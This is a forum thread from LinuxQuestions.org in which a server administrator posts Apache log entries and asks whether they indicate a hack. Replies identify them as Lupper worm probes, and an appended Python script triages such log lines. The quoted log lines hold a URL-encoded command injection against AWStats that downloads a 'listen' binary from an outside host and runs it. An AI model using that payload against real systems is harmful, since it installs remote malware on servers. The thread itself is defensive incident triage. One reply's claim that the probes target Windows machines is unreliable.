LinuxQuestions.org
Old 11-27-2005, 08:06 PM   #1
lawadm1
Member
 
Registered: Jul 2003
Location: Illinois
Distribution: Fedora 11, Ubuntu 9.04
Posts: 80

Rep: Reputation: 15
Question Apache entries - Hacked??


I found the following entries in my access_log that I have never received before. It looks like they were all 404, but I would feel much better if someone verified it. TIA Jeff

211.214.161.159 - - [27/Nov/2005:14:13:22 -0600] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:23 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:25 -0600] "POST /xmlrpc.php HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:27 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:28 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:32 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:33 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
 
Old 11-27-2005, 08:22 PM   #2
lord-fu
Member
 
Registered: Apr 2005
Location: Ohio
Distribution: Slackware && freeBSD
Posts: 676

Rep: Reputation: 30
Hi,

Not a security expert but I have seen those in my logs as well and they are looking for those files on windoze machines. I believe IMHO that you can safely ignore those...however I am no expert and I am sure someone else will give their input as well.
 
Old 11-27-2005, 08:49 PM   #3
btmiller
Senior Member
 
Registered: May 2004
Location: In the DC 'burbs
Distribution: Arch, Scientific Linux, Debian, Ubuntu
Posts: 4,133

Rep: Reputation: 320
I think they are looking for *nix boxen, since these look a lot like hits from the Lupper worm, which attacks several vulnerable Web applications. I've seen this on a number of servers, and so long as you don't have the vulnerable applications installed, you are OK.
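
A triage sketch for the question asked in this thread, added here as an example and not posted by any participant: it parses Apache access-log lines, picks out the AWStats `configdir` and `xmlrpc.php` probes of the kind shown in post #1, and separates the ones answered with a 4xx from the ones the server actually handled. The sample lines, addresses and the names `triage`, `LINE_RE` and `PROBE_RE` are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined format: host ident user [time] "METHOD url PROTO" status bytes ...
# The URL group is lazy so it survives stray spaces inside the request target.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*?) HTTP/[\d.]+" (\d{3}) \S+')

# Request shapes from the thread's excerpt: AWStats configdir= and any */xmlrpc.php
PROBE_RE = re.compile(r'awstats\.pl\?.*configdir=|/xmlrpc\.php(\?|$)', re.I)

# Constructed sample lines (documentation addresses, harmless marker payload)
SAMPLE = [
    '192.0.2.10 - - [27/Nov/2005:14:13:22 -0600] "GET /awstats/awstats.pl'
    '?configdir=|echo%20YYY| HTTP/1.1" 404 298 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [27/Nov/2005:14:13:25 -0600] "POST /xmlrpc.php HTTP/1.1" '
    '404 290 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [27/Nov/2005:14:13:33 -0600] "POST /wordpress/xmlrpc.php '
    'HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [27/Nov/2005:14:20:01 -0600] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0"',
]

def triage(lines):
    """Return (probes, served): every probe hit, and those not answered 4xx."""
    probes, served = [], []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        host, when, method, url, status = m.groups()
        url = unquote(url)  # decode %xx so the request is readable
        if not PROBE_RE.search(url):
            continue
        hit = {"host": host, "time": when, "method": method,
               "url": url, "status": int(status)}
        probes.append(hit)
        # 4xx means the target path was not there; anything else (2xx, 3xx,
        # 5xx) means the server did something with it and needs a closer look.
        if not 400 <= hit["status"] < 500:
            served.append(hit)
    return probes, served

if __name__ == "__main__":
    probes, served = triage(SAMPLE)
    print(f"{len(probes)} probe requests, {len(served)} not answered with 4xx")
    for hit in served:
        print("CHECK:", hit["host"], hit["time"], hit["method"], hit["url"], hit["status"])
```

An empty `served` list matches the situation described in post #1, where every probe received a 404; any entry in it points at an installed application whose version should be checked.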
 
  

